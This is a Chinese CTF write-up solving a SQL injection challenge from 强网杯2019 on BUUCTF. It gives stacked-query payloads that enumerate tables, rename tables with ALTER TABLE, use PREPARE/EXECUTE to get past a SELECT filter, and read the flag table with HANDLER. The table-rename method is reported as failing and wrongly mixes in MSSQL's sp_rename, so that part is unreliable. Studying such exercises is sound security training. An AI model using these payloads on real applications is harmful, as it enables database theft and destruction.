BUUCTF-[强网杯2019]随便注
强网杯2019随便注
它说随便注,它可不是随便注入的哈
首先测试闭合环境,因为有回显,所以很快即知道了是一个单引号闭合
接下来常规操作,得到列数大概为2
1';select 2;
返回了过滤信息
于是使用show来查看库,表,列
显然,这里已经将select过滤掉,只有对这个过滤进行一个绕过才能够得到flag
接着查询表名:
1';show tables;
又发现这里有两个表名
所以考虑3个方式:
方式1:修改表名
思路:既然只输入一个值进去就能够查询,说明这里的前后,必然有表名的存在。能不能将
增加列:
alter table tableName add columnName varchar(30)
修改列名称:
sp_rename '表名.原列名','新列名'
修改表名:
alter table old_table_name rename to new_table_name;
playload+解释:
1.查看表名:
1’;show tables;
得到两张表:
`1919810931114514`
`words`
2.查看表结构:
1';show columns from `1919810931114514`;
1';show columns from `words`;
由于图片有点长,就不粘贴了
需要注意的在表`1919810931114514`中有flag,在`words`中有id
3.修改表名:将数字表修改为其它名字
1';alter table `1919810931114514` rename to shuzi;
4.修改表名2:交换名称
1';alter table `words` rename to `1919810931114514`;alter table `shuzi` rename to `words`;sp_rename 'words.flag','id';
为什么这一句这么长?
因为查询的是words表的id,修改之后,原来的数字表中不存在id,所以要进行添加,必须在修改words的时候添加。如果不在这个时候添加,就会出现语句漏洞,而报错,就得重新开环境了。别问为什么,因为错了很多次。
结果报错了:
那看来不能修改表名。俺这里是真的不行了,建议看看其他大佬的。
方法2:预处理
1';set @sql=concat('s','elect * from 1919810931114514');PREPARE pre FROM @sql;EXECUTE pre;--+
MySQL的SQL预处理(Prepared) - GeaoZhang - 博客园 (cnblogs.com))
方法3:handler
利用其他命令:
handler table open;handler table read first; #打开表,读取
-1';handler `words` open;handler `words` read first;#
-1';handler `1919810931114514` open;handler `1919810931114514` read first;#